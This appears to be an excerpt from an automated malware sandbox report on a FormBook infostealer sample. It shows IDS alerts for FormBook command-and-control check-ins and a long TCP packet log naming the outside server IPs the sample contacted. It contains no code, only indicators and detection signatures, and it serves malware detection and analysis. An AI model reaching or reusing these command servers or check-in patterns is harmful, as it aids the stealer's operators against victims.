              2024-09-06T09:05:46.700782+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649738192.185.16.20980TCP
              2024-09-06T09:05:49.332222+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649739192.185.16.20980TCP
              2024-09-06T09:05:49.332222+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649739192.185.16.20980TCP
              2024-09-06T09:06:00.673507+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649741154.23.184.24080TCP
              2024-09-06T09:06:03.167528+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649742154.23.184.24080TCP
              2024-09-06T09:06:05.778487+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649743154.23.184.24080TCP
              2024-09-06T09:06:08.287501+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649744154.23.184.24080TCP
              2024-09-06T09:06:08.287501+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649744154.23.184.24080TCP
              2024-09-06T09:06:22.189612+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64974565.21.196.9080TCP
              2024-09-06T09:06:24.737470+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64974665.21.196.9080TCP
              2024-09-06T09:06:27.323067+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64974765.21.196.9080TCP
              2024-09-06T09:06:29.841068+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64974865.21.196.9080TCP
              2024-09-06T09:06:29.841068+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64974865.21.196.9080TCP
              2024-09-06T09:06:35.510266+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649749184.94.212.11580TCP
              2024-09-06T09:06:38.151543+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649750184.94.212.11580TCP
              2024-09-06T09:06:40.600160+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649751184.94.212.11580TCP
              2024-09-06T09:06:43.148784+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649752184.94.212.11580TCP
              2024-09-06T09:06:43.148784+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649752184.94.212.11580TCP
              2024-09-06T09:06:49.258887+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64975491.215.85.2380TCP
              2024-09-06T09:06:52.613533+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64975591.215.85.2380TCP
              2024-09-06T09:06:54.344365+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64975691.215.85.2380TCP
              2024-09-06T09:06:56.875392+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64975791.215.85.2380TCP
              2024-09-06T09:06:56.875392+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64975791.215.85.2380TCP
              2024-09-06T09:07:04.273408+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649758121.199.37.1980TCP
              2024-09-06T09:07:06.426978+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649759121.199.37.1980TCP
              2024-09-06T09:07:09.026693+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649760121.199.37.1980TCP
              2024-09-06T09:07:11.581505+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649761121.199.37.1980TCP
              2024-09-06T09:07:11.581505+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649761121.199.37.1980TCP
              2024-09-06T09:07:17.619609+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649762188.114.96.380TCP
              2024-09-06T09:07:20.122717+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649763188.114.96.380TCP
              2024-09-06T09:07:22.713243+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649764188.114.96.380TCP
              2024-09-06T09:07:25.218313+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649765188.114.96.380TCP
              2024-09-06T09:07:25.218313+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649765188.114.96.380TCP
              2024-09-06T09:07:30.825610+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6497663.33.130.19080TCP
              2024-09-06T09:07:33.381973+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6497673.33.130.19080TCP
              2024-09-06T09:07:35.906942+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6497683.33.130.19080TCP
              2024-09-06T09:07:39.405725+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6497693.33.130.19080TCP
              2024-09-06T09:07:39.405725+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6497693.33.130.19080TCP
              2024-09-06T09:07:46.035534+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6497705.144.130.5280TCP
              2024-09-06T09:07:48.582234+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6497715.144.130.5280TCP
              2024-09-06T09:07:51.129078+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6497725.144.130.5280TCP
              2024-09-06T09:08:01.970754+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6497735.144.130.5280TCP
              2024-09-06T09:08:01.970754+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6497735.144.130.5280TCP
              2024-09-06T09:08:07.624536+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649774162.241.226.19080TCP
              2024-09-06T09:08:10.175077+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649775162.241.226.19080TCP
              2024-09-06T09:08:12.769226+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649776162.241.226.19080TCP
              2024-09-06T09:08:15.289436+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649777162.241.226.19080TCP
              2024-09-06T09:08:15.289436+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649777162.241.226.19080TCP
              2024-09-06T09:08:21.131653+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649778217.160.0.19380TCP
              2024-09-06T09:08:23.701868+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649779217.160.0.19380TCP
              2024-09-06T09:08:26.330692+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649780217.160.0.19380TCP
              2024-09-06T09:08:30.166098+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649782217.160.0.19380TCP
              2024-09-06T09:08:30.166098+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649782217.160.0.19380TCP

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Sep 6, 2024 09:04:57.606744051 CEST4972380192.168.2.63.33.130.190
              Sep 6, 2024 09:04:57.611593962 CEST80497233.33.130.190192.168.2.6
              Sep 6, 2024 09:04:57.611654997 CEST4972380192.168.2.63.33.130.190
              Sep 6, 2024 09:04:57.620086908 CEST4972380192.168.2.63.33.130.190
              Sep 6, 2024 09:04:57.624877930 CEST80497233.33.130.190192.168.2.6
              Sep 6, 2024 09:04:58.073688030 CEST80497233.33.130.190192.168.2.6
              Sep 6, 2024 09:04:58.073709965 CEST80497233.33.130.190192.168.2.6
              Sep 6, 2024 09:04:58.073868036 CEST4972380192.168.2.63.33.130.190
              Sep 6, 2024 09:04:58.077333927 CEST4972380192.168.2.63.33.130.190
              Sep 6, 2024 09:04:58.083972931 CEST80497233.33.130.190192.168.2.6
              Sep 6, 2024 09:05:13.221421003 CEST4972580192.168.2.665.21.196.90
              Sep 6, 2024 09:05:13.226874113 CEST804972565.21.196.90192.168.2.6
              Sep 6, 2024 09:05:13.226947069 CEST4972580192.168.2.665.21.196.90
              Sep 6, 2024 09:05:13.238421917 CEST4972580192.168.2.665.21.196.90
              Sep 6, 2024 09:05:13.243289948 CEST804972565.21.196.90192.168.2.6
              Sep 6, 2024 09:05:13.887362957 CEST804972565.21.196.90192.168.2.6
              Sep 6, 2024 09:05:13.887382030 CEST804972565.21.196.90192.168.2.6
              Sep 6, 2024 09:05:13.887461901 CEST4972580192.168.2.665.21.196.90
              Sep 6, 2024 09:05:14.754242897 CEST4972580192.168.2.665.21.196.90
              Sep 6, 2024 09:05:15.773287058 CEST4972780192.168.2.665.21.196.90
              Sep 6, 2024 09:05:15.778156996 CEST804972765.21.196.90192.168.2.6
              Sep 6, 2024 09:05:15.778251886 CEST4972780192.168.2.665.21.196.90
              Sep 6, 2024 09:05:15.788914919 CEST4972780192.168.2.665.21.196.90
              Sep 6, 2024 09:05:15.793726921 CEST804972765.21.196.90192.168.2.6
              Sep 6, 2024 09:05:16.457181931 CEST804972765.21.196.90192.168.2.6
              Sep 6, 2024 09:05:16.457257032 CEST804972765.21.196.90192.168.2.6
              Sep 6, 2024 09:05:16.457324982 CEST4972780192.168.2.665.21.196.90
              Sep 6, 2024 09:05:17.301121950 CEST4972780192.168.2.665.21.196.90
              Sep 6, 2024 09:05:18.320031881 CEST4972880192.168.2.665.21.196.90
              Sep 6, 2024 09:05:18.324968100 CEST804972865.21.196.90192.168.2.6
              Sep 6, 2024 09:05:18.325088024 CEST4972880192.168.2.665.21.196.90
              Sep 6, 2024 09:05:18.334827900 CEST4972880192.168.2.665.21.196.90
              Sep 6, 2024 09:05:18.339688063 CEST804972865.21.196.90192.168.2.6
              Sep 6, 2024 09:05:18.339796066 CEST804972865.21.196.90192.168.2.6
              Sep 6, 2024 09:05:18.984230042 CEST804972865.21.196.90192.168.2.6
              Sep 6, 2024 09:05:18.984276056 CEST804972865.21.196.90192.168.2.6
              Sep 6, 2024 09:05:18.984330893 CEST4972880192.168.2.665.21.196.90
              Sep 6, 2024 09:05:19.848038912 CEST4972880192.168.2.665.21.196.90
              Sep 6, 2024 09:05:20.867063999 CEST4972980192.168.2.665.21.196.90
              Sep 6, 2024 09:05:20.872008085 CEST804972965.21.196.90192.168.2.6
              Sep 6, 2024 09:05:20.872133017 CEST4972980192.168.2.665.21.196.90
              Sep 6, 2024 09:05:20.879736900 CEST4972980192.168.2.665.21.196.90
              Sep 6, 2024 09:05:20.884596109 CEST804972965.21.196.90192.168.2.6
              Sep 6, 2024 09:05:21.548053026 CEST804972965.21.196.90192.168.2.6
              Sep 6, 2024 09:05:21.548072100 CEST804972965.21.196.90192.168.2.6
              Sep 6, 2024 09:05:21.548285961 CEST4972980192.168.2.665.21.196.90
              Sep 6, 2024 09:05:21.551422119 CEST4972980192.168.2.665.21.196.90
              Sep 6, 2024 09:05:21.556169033 CEST804972965.21.196.90192.168.2.6
              Sep 6, 2024 09:05:27.106570959 CEST4973180192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:27.111434937 CEST8049731162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:27.111526012 CEST4973180192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:27.122359991 CEST4973180192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:27.127202988 CEST8049731162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:27.679925919 CEST8049731162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:27.679946899 CEST8049731162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:27.679959059 CEST8049731162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:27.679971933 CEST8049731162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:27.679985046 CEST8049731162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:27.680015087 CEST4973180192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:27.680053949 CEST4973180192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:28.629139900 CEST4973180192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:29.648310900 CEST4973280192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:29.653224945 CEST8049732162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:29.653311014 CEST4973280192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:29.664473057 CEST4973280192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:29.669301987 CEST8049732162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:30.217308998 CEST8049732162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:30.217325926 CEST8049732162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:30.217344046 CEST8049732162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:30.217359066 CEST8049732162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:30.217371941 CEST8049732162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:30.217391014 CEST4973280192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:30.217434883 CEST4973280192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:30.217447042 CEST4973280192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:31.176527023 CEST4973280192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:32.195089102 CEST4973380192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:32.199925900 CEST8049733162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:32.200045109 CEST4973380192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:32.211046934 CEST4973380192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:32.215887070 CEST8049733162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:32.215962887 CEST8049733162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:32.775672913 CEST8049733162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:32.775707006 CEST8049733162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:32.775719881 CEST8049733162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:32.775732040 CEST8049733162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:32.775791883 CEST4973380192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:32.775849104 CEST8049733162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:32.775913000 CEST4973380192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:33.722918034 CEST4973380192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:34.741786957 CEST4973480192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:34.746686935 CEST8049734162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:34.746774912 CEST4973480192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:34.753987074 CEST4973480192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:34.758779049 CEST8049734162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:35.323096037 CEST8049734162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:35.323205948 CEST8049734162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:35.323220015 CEST8049734162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:35.323237896 CEST8049734162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:35.323251009 CEST8049734162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:35.323271036 CEST4973480192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:35.323353052 CEST4973480192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:35.326148033 CEST4973480192.168.2.6162.240.81.18
              Sep 6, 2024 09:05:35.331008911 CEST8049734162.240.81.18192.168.2.6
              Sep 6, 2024 09:05:41.015929937 CEST4973680192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:41.020688057 CEST8049736192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:41.020756960 CEST4973680192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:41.032069921 CEST4973680192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:41.036797047 CEST8049736192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:41.648008108 CEST8049736192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:41.648026943 CEST8049736192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:41.648041010 CEST8049736192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:41.648087025 CEST4973680192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:41.648103952 CEST8049736192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:41.648117065 CEST8049736192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:41.648128033 CEST8049736192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:41.648144960 CEST8049736192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:41.648152113 CEST4973680192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:41.648173094 CEST4973680192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:41.648258924 CEST8049736192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:41.648272991 CEST8049736192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:41.648284912 CEST8049736192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:41.648303032 CEST4973680192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:41.648330927 CEST4973680192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:42.535439014 CEST4973680192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:43.554698944 CEST4973780192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:43.559640884 CEST8049737192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:43.559740067 CEST4973780192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:43.572170019 CEST4973780192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:43.577023983 CEST8049737192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:44.232013941 CEST8049737192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:44.232034922 CEST8049737192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:44.232048988 CEST8049737192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:44.232124090 CEST4973780192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:44.232156038 CEST8049737192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:44.232168913 CEST8049737192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:44.232180119 CEST8049737192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:44.232192039 CEST8049737192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:44.232198954 CEST4973780192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:44.232218027 CEST4973780192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:44.232345104 CEST8049737192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:44.232357979 CEST8049737192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:44.232372999 CEST8049737192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:44.232381105 CEST4973780192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:44.232407093 CEST4973780192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:45.082331896 CEST4973780192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:46.101007938 CEST4973880192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:46.105830908 CEST8049738192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:46.105935097 CEST4973880192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:46.117055893 CEST4973880192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:46.121896982 CEST8049738192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:46.122077942 CEST8049738192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:46.700680971 CEST8049738192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:46.700699091 CEST8049738192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:46.700717926 CEST8049738192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:46.700778961 CEST8049738192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:46.700782061 CEST4973880192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:46.700790882 CEST8049738192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:46.700803995 CEST8049738192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:46.700817108 CEST8049738192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:46.700841904 CEST4973880192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:46.700854063 CEST4973880192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:46.700944901 CEST8049738192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:46.700956106 CEST8049738192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:46.700968027 CEST8049738192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:46.700979948 CEST4973880192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:46.701014996 CEST4973880192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:46.705580950 CEST8049738192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:46.754057884 CEST4973880192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:47.629359961 CEST4973880192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:48.657974958 CEST4973980192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:48.663589001 CEST8049739192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:48.663739920 CEST4973980192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:48.671171904 CEST4973980192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:48.677064896 CEST8049739192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:49.277040005 CEST8049739192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:49.332221985 CEST4973980192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:54.277549028 CEST8049739192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:54.277690887 CEST4973980192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:54.278563023 CEST4973980192.168.2.6192.185.16.209
              Sep 6, 2024 09:05:54.283287048 CEST8049739192.185.16.209192.168.2.6
              Sep 6, 2024 09:05:59.734452963 CEST4974180192.168.2.6154.23.184.240
              Sep 6, 2024 09:05:59.739500046 CEST8049741154.23.184.240192.168.2.6
              Sep 6, 2024 09:05:59.739579916 CEST4974180192.168.2.6154.23.184.240
              Sep 6, 2024 09:05:59.752734900 CEST4974180192.168.2.6154.23.184.240
              Sep 6, 2024 09:05:59.757766962 CEST8049741154.23.184.240192.168.2.6
              Sep 6, 2024 09:06:00.669884920 CEST8049741154.23.184.240192.168.2.6
              Sep 6, 2024 09:06:00.670073032 CEST8049741154.23.184.240192.168.2.6
              Sep 6, 2024 09:06:00.673506975 CEST4974180192.168.2.6154.23.184.240
              Sep 6, 2024 09:06:01.254208088 CEST4974180192.168.2.6154.23.184.240
              Sep 6, 2024 09:06:02.273475885 CEST4974280192.168.2.6154.23.184.240
              Sep 6, 2024 09:06:02.278383017 CEST8049742154.23.184.240192.168.2.6
              Sep 6, 2024 09:06:02.278521061 CEST4974280192.168.2.6154.23.184.240
              Sep 6, 2024 09:06:02.289906979 CEST4974280192.168.2.6154.23.184.240
              Sep 6, 2024 09:06:02.297916889 CEST8049742154.23.184.240192.168.2.6
              Sep 6, 2024 09:06:03.167438984 CEST8049742154.23.184.240192.168.2.6
              Sep 6, 2024 09:06:03.167462111 CEST8049742154.23.184.240192.168.2.6
              Sep 6, 2024 09:06:03.167527914 CEST4974280192.168.2.6154.23.184.240
              Sep 6, 2024 09:06:03.801131964 CEST4974280192.168.2.6154.23.184.240
              Sep 6, 2024 09:06:04.823123932 CEST4974380192.168.2.6154.23.184.240
              Sep 6, 2024 09:06:04.828011990 CEST8049743154.23.184.240192.168.2.6
              Sep 6, 2024 09:06:04.828150988 CEST4974380192.168.2.6154.23.184.240
              Sep 6, 2024 09:06:04.839206934 CEST4974380192.168.2.6154.23.184.240
              Sep 6, 2024 09:06:04.844083071 CEST8049743154.23.184.240192.168.2.6
              Sep 6, 2024 09:06:04.844280005 CEST8049743154.23.184.240192.168.2.6
              Sep 6, 2024 09:06:05.778408051 CEST8049743154.23.184.240192.168.2.6
              Sep 6, 2024 09:06:05.778431892 CEST8049743154.23.184.240192.168.2.6
              Sep 6, 2024 09:06:05.778486967 CEST4974380192.168.2.6154.23.184.240
              Sep 6, 2024 09:06:06.348017931 CEST4974380192.168.2.6154.23.184.240
              Sep 6, 2024 09:06:07.367432117 CEST4974480192.168.2.6154.23.184.240
              Sep 6, 2024 09:06:07.373111963 CEST8049744154.23.184.240192.168.2.6
              Sep 6, 2024 09:06:07.373173952 CEST4974480192.168.2.6154.23.184.240
              Sep 6, 2024 09:06:07.384383917 CEST4974480192.168.2.6154.23.184.240
              Sep 6, 2024 09:06:07.389164925 CEST8049744154.23.184.240192.168.2.6
              Sep 6, 2024 09:06:08.286851883 CEST8049744154.23.184.240192.168.2.6
              Sep 6, 2024 09:06:08.287286997 CEST8049744154.23.184.240192.168.2.6
              Sep 6, 2024 09:06:08.287501097 CEST4974480192.168.2.6154.23.184.240
              Sep 6, 2024 09:06:08.291498899 CEST4974480192.168.2.6154.23.184.240
              Sep 6, 2024 09:06:08.296349049 CEST8049744154.23.184.240192.168.2.6
              Sep 6, 2024 09:06:21.491064072 CEST4974580192.168.2.665.21.196.90
              Sep 6, 2024 09:06:21.496023893 CEST804974565.21.196.90192.168.2.6
              Sep 6, 2024 09:06:21.496107101 CEST4974580192.168.2.665.21.196.90
              Sep 6, 2024 09:06:21.509947062 CEST4974580192.168.2.665.21.196.90
              Sep 6, 2024 09:06:21.515137911 CEST804974565.21.196.90192.168.2.6
              Sep 6, 2024 09:06:22.183772087 CEST804974565.21.196.90192.168.2.6
              Sep 6, 2024 09:06:22.183917999 CEST804974565.21.196.90192.168.2.6
              Sep 6, 2024 09:06:22.189611912 CEST4974580192.168.2.665.21.196.90
              Sep 6, 2024 09:06:23.019996881 CEST4974580192.168.2.665.21.196.90
              Sep 6, 2024 09:06:24.046689987 CEST4974680192.168.2.665.21.196.90
              Sep 6, 2024 09:06:24.052422047 CEST804974665.21.196.90192.168.2.6
              Sep 6, 2024 09:06:24.059458017 CEST4974680192.168.2.665.21.196.90
              Sep 6, 2024 09:06:24.067521095 CEST4974680192.168.2.665.21.196.90
              Sep 6, 2024 09:06:24.073198080 CEST804974665.21.196.90192.168.2.6
              Sep 6, 2024 09:06:24.735851049 CEST804974665.21.196.90192.168.2.6
              Sep 6, 2024 09:06:24.735908985 CEST804974665.21.196.90192.168.2.6
              Sep 6, 2024 09:06:24.737469912 CEST4974680192.168.2.665.21.196.90
              Sep 6, 2024 09:06:25.582329035 CEST4974680192.168.2.665.21.196.90
              Sep 6, 2024 09:06:26.601417065 CEST4974780192.168.2.665.21.196.90
              Sep 6, 2024 09:06:26.607245922 CEST804974765.21.196.90192.168.2.6
              Sep 6, 2024 09:06:26.607343912 CEST4974780192.168.2.665.21.196.90
              Sep 6, 2024 09:06:26.621428967 CEST4974780192.168.2.665.21.196.90
              Sep 6, 2024 09:06:26.626305103 CEST804974765.21.196.90192.168.2.6
              Sep 6, 2024 09:06:26.626369953 CEST804974765.21.196.90192.168.2.6
              Sep 6, 2024 09:06:27.322665930 CEST804974765.21.196.90192.168.2.6
              Sep 6, 2024 09:06:27.322992086 CEST804974765.21.196.90192.168.2.6
              Sep 6, 2024 09:06:27.323066950 CEST4974780192.168.2.665.21.196.90
              Sep 6, 2024 09:06:28.129422903 CEST4974780192.168.2.665.21.196.90
              Sep 6, 2024 09:06:29.148967028 CEST4974880192.168.2.665.21.196.90
              Sep 6, 2024 09:06:29.154062033 CEST804974865.21.196.90192.168.2.6
              Sep 6, 2024 09:06:29.154145002 CEST4974880192.168.2.665.21.196.90
              Sep 6, 2024 09:06:29.164484978 CEST4974880192.168.2.665.21.196.90
              Sep 6, 2024 09:06:29.169527054 CEST804974865.21.196.90192.168.2.6
              Sep 6, 2024 09:06:29.840902090 CEST804974865.21.196.90192.168.2.6
              Sep 6, 2024 09:06:29.840919971 CEST804974865.21.196.90192.168.2.6
              Sep 6, 2024 09:06:29.841068029 CEST4974880192.168.2.665.21.196.90
              Sep 6, 2024 09:06:29.845953941 CEST4974880192.168.2.665.21.196.90
              Sep 6, 2024 09:06:29.850744963 CEST804974865.21.196.90192.168.2.6
              Sep 6, 2024 09:06:34.913434029 CEST4974980192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:34.918241024 CEST8049749184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:34.921482086 CEST4974980192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:34.933149099 CEST4974980192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:34.938041925 CEST8049749184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:35.510173082 CEST8049749184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:35.510221958 CEST8049749184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:35.510231972 CEST8049749184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:35.510266066 CEST4974980192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:35.510305882 CEST8049749184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:35.510318041 CEST8049749184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:35.510345936 CEST4974980192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:35.510400057 CEST8049749184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:35.510412931 CEST8049749184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:35.510422945 CEST8049749184.94.212.115192.168.2.6
              Sep 6, 2024 09:06:35.510436058 CEST4974980192.168.2.6184.94.212.115
              Sep 6, 2024 09:06:35.510457993 CEST4974980192.168.2.6184.94.212.115
